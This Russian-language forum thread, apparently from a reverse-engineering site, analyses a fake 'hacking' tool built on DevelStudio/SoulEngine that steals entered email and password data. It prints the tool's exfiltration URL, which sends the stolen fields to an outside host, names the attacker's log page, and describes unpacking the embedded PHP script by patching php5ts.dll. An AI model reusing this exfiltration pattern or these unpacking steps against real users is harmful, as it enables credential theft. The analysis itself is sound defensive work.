Поискал, вроде похожих тем нет. Попросили меня покопать одну программку, собственно вот она:

видео http://www.youtube.com/watch?v=Y-4SMzHonpU
ну и ссылочка http://yadi.sk/d/VH_X4d3A3KClt

Программко конечно развод, но судь не в этом (просто отслылает данные формы на сторонний сайт :

http://xaker-g.host56.com/s/s.gif?E-mail:Ty_loshara|E-mail-password:HujTebe|%CF%CF-password:ugaday


интерпритирует скрипт --> SoulEngine <--

Хотелось бы в конечном итоге иметь возможность более продуктивно и удобно анализировать подобный софт.
Может кто сталкивался уже с SoulEngine? Есть ли декомпиляторы / выдиралки скрипта?

-----
-=истина где-то рядом=-

| Сообщение посчитали полезным:

по что антивирусы ее не любят?
вконце екзешника php скрипт, пожат и забейзен 64
так что восстановить можно, дерзайте

| Сообщение посчитали полезным:

reversecode, полезно...
а я тут начал инжектиться в php5ts.inflate, подгружается из темпа виды, куда до этого распаковывается порогой. На выходе в esi указатель на расшифрованный код.

в данном случае у мну:




Покапаю конец файла, спасибо за наводку...



(add)


reversecode пишет:
вконце екзешника php скрипт, пожат и забейзен 64

Кагбэ да, но если его раскодировать, как то он не совсем похож на оригенал (см. выше)

499a_22.04.2013_EXELAB.rU.tgz - 2e80106aa355b6a91a9704c57e8a5076.phpe2

-----
-=истина где-то рядом=-

| Сообщение посчитали полезным:

Вот такая бойда после раскода

73a9_22.04.2013_EXELAB.rU.tgz - Decod.rar

| Сообщение посчитали полезным:

дебейзили? а де безип2 кто будет делать?

| Сообщение посчитали полезным:

reversecode пишет:
безип2 кто будет делать?

Так вроде бы в безип2 сигнатура BZh должна быть, а ее нету...

-----
-=истина где-то рядом=-

| Сообщение посчитали полезным:

xaker-g(point)host56(point)com/s/log.php
...
Как много в этой ссылке..

| Сообщение посчитали полезным:

Там уже ничего нет, или новенький или кто то почистил.

| Сообщение посчитали полезным:

Alinator3500 пишет:
Там уже ничего нет, или новенький или кто то почистил.

Вычищено.
P.S. После моего поста была создана тема про исходники win7 с гей-порно-картинкой. Меня это насторожило ))) Видимо аффтар таким образом высказал свое "негодуэ" после прочтения поста.
P.S.S. Афтар, ничего личного. Изъян налицо
От модератора: нет-нет, это местный дурачок 00, он же 2013, он же типа дева с татухой недавняя и тд, снова анально уязвлён, что его забанили и пинка дали

Да на самом деле-то и ценного там ничего не было.. около 10-20 уникальных мыльников с паролями и все.

| Сообщение посчитали полезным:

Rainbow пишет:
Вычищено.

Да куда там, я только что почистел, до сих пор ведутся...


скрин номер раз (платежный ароль имееццо):







Теперь по теме: пропатчил длл php5ts.dll, теперь она выдает окошко со скриптом, который уже расшифрован. Вс работает заебушечки, но только под отладчиком. Ясный перь, гдето проверка црц есть, но мне копать дольше копать влом, бо и так сойдет, но мож если у кого время лишнее будет, был бы признателен за намек.


Наблюдение номер 2:



Эти файлы (темп винды) не удаляются, т.е. пограммулина темп не чистит и при запуске не перезаписывает. Так что если оставить пропатченную длл там, то можно больше не заморачиваться, она будет заюзана.


и самое интересное:



наютубике
1. пишем "взлом...."
2. Фильтер: "за послебнюю неделю"
3......
4. PROFIT

-----
-=истина где-то рядом=-

| Сообщение посчитали полезным:

Грац ! Просто было лень раскручивать

| Сообщение посчитали полезным:

IP: 66.249.75.14 (whois)
QUERY:
REFERER:
AGENT: Googlebot-Image/1.0

Понеслась...

| Сообщение посчитали полезным:

Rainbow пишет:
Вс работает заебушечки, но только под отладчиком

Хм, под отладчиком работает только на рабочем компе, на ноуте все ок. Отбой. Хз, что это было...

Как и говорил раньше, самое простое решение посмотреть что на входе у php5ts.inflate



з.ы. а программку то писала девочко:


у нее на канале еще пару ведюшек есть похожих...


[добавлено]

для особо ленивых но желающих узнать, как школьники узнали как быстро кодить не детектируемые малвари, вот видео: http://www.youtube.com/watch?v=-a-ldQIhDlA
Таких видяшек полно, так что эпиемия пятиметровых мэлварий и винлукиров не за горами уже есть.


[добавлено]
а этот самородок ломает вконтакте даже без подключения интернета, обратите внимания на ошибки генерируемые в develstudio где просматриваются стенные пути и функционал.
http://www.youtube.com/watch?v=5Ur17CDnwqE

-----
-=истина где-то рядом=-

| Сообщение посчитали полезным:

KingSise пишет:
как школьники узнали как быстро кодить не детектируемые малвари, вот видео

С выходом из анабиоза =) Школьники давно уже на develstudio лабают вирусню и видео полно. Если порыться на форуме develstudio то можно найти тему где-то годичной давности, где авторы писали, что выпилили автоматическое сжатие UPX, т.к. много малвари пишут :D (там раньше галочка была, сжимать сразу upx).

KingSise пишет:
ак что эпиемия пятиметровых мэлварий и винлукиров не за горами

reversecode пишет:
по что антивирусы ее не любят?

Вот за это и не любят, и при этом большинство, особо не разбираясь, детектят сразу стаб develstudio :D Авторы там же на форуме плакались =)

| Сообщение посчитали полезным:

Интересный глюк заметил - эта тема нигде не отображалась, пока через профиль в нее не зайдешь и не отправишь что то....

gloomdemon пишет:
:D Авторы там же на форуме плакались =

Ну а как еще детектить, если программа вредоносного нечего не делает, просто кнопку отправить переименовали в взломать.

-----
-=истина где-то рядом=-

| Сообщение посчитали полезным:

Суть бага данного снифака не только в ПО. Данный(е) деятель(и) реально школьники после видеотутора

| Сообщение посчитали полезным: